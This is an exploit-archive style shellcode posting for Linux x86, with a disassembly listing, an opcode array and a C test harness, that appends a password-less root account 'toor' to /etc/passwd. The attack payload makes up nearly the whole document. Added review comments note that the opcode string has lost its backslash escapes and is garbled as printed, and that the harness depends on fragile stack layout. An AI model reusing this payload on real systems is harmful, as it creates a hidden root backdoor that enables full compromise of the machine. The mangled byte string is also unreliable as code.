# Title : linux/x86 append "/etc/passwd" & exit() 107 bytes
# Published : 2009-12-31
# Author : sandman
/*
append_passwd.c
Payload: Appends the line [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd, thereby adding a password-less root account with login name "toor"
Platform: linux/x86
Size: 107 bytes
Author: $andman
*/
/*
08049054 <_start>:
8049054: eb 38 jmp 804908e <callfunc>
08049056 <func>:
8049056: 5e pop %esi
8049057: 31 c0 xor %eax,%eax
8049059: 88 46 0b mov %al,0xb(%esi)
804905c: 88 46 2b mov %al,0x2b(%esi)
804905f: c6 46 2a 0a movb $0xa,0x2a(%esi)
8049063: 8d 5e 0c lea 0xc(%esi),%ebx
8049066: 89 5e 2c mov %ebx,0x2c(%esi)
8049069: 8d 1e lea (%esi),%ebx
804906b: 66 b9 42 04 mov $0x442,%cx
804906f: 66 ba a4 01 mov $0x1a4,%dx
8049073: b0 05 mov $0x5,%al
8049075: cd 80 int $0x80
8049077: 89 c3 mov %eax,%ebx
8049079: 31 d2 xor %edx,%edx
804907b: 8b 4e 2c mov 0x2c(%esi),%ecx
804907e: b2 1f mov $0x1f,%dl
8049080: b0 04 mov $0x4,%al
8049082: cd 80 int $0x80
8049084: b0 06 mov $0x6,%al
8049086: cd 80 int $0x80
8049088: b0 01 mov $0x1,%al
804908a: 31 db xor %ebx,%ebx
804908c: cd 80 int $0x80
0804908e <callfunc>:
804908e: e8 c3 ff ff ff call 8049056 <func>
8049093: ......string.......
*/
#include <stdio.h>
#include <string.h>
/*
 * Opcode bytes of the payload whose disassembly is listed above, followed by
 * the data the payload works on: the path "/etc/passwd" and the passwd line
 * it writes (everything from the 0x2f 0x65 0x74 0x63 bytes onward).
 *
 * NOTE(review): every "\x" escape in this literal has lost its backslash in
 * transcription ("xeb" where the listing shows 0xeb), so as printed this
 * array holds plain ASCII text rather than the bytes in the disassembly, and
 * the length that main() prints will presumably not match the size given in
 * the header.
 */
char shell[]= "xebx38x5ex31xc0x88x46x0bx88x46x2bxc6x46x2ax0ax8dx5ex0cx89x5ex2cx8dx1e"
"x66xb9x42x04x66xbaxa4x01xb0x05xcdx80x89xc3x31xd2x8bx4ex2cxb2x1fxb0x04"
"xcdx80xb0x06xcdx80xb0x01x31xdbxcdx80xe8xc3xffxffxffx2fx65x74x63x2fx70"
"x61x73x73x77x64x23x74x6fx6fx72x3ax3ax30x3ax30x3ax74x30x30x72x3ax2fx72"
"x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68x20x23";
/*
 * Test harness: prints the length of shell[] and then tries to transfer
 * control to it by overwriting what it assumes is main's saved return
 * address on the stack.
 *
 * NOTE(review): pre-C99 style; the missing return type makes main()
 * implicitly int, which C99 and later compilers reject.
 */
main(){
/* Format/argument mismatch: strlen() returns size_t, so the conversion
 * should be "%zu" (passing it to "%d" is undefined behaviour). The trailing
 * "\n" also appears to have lost its backslash in transcription, so the
 * format string ends in a literal 'n'. */
printf("[+]shellcode length %dn", strlen(shell));
int *ret;
/* Assumes the saved return address sits exactly two words above the local
 * `ret` in this frame. That layout is compiler- and option-specific; with a
 * stack protector, a different frame layout, or a non-executable data
 * segment this write most likely crashes or has no effect rather than
 * reaching shell[]. The (int) cast also truncates the pointer on 64-bit
 * targets; the payload is x86-32 only, as the Platform line above states. */
ret = (int *)&ret + 2;
(*ret) = (int)shell;
}
//HAPPY NEW YEAR!
//#$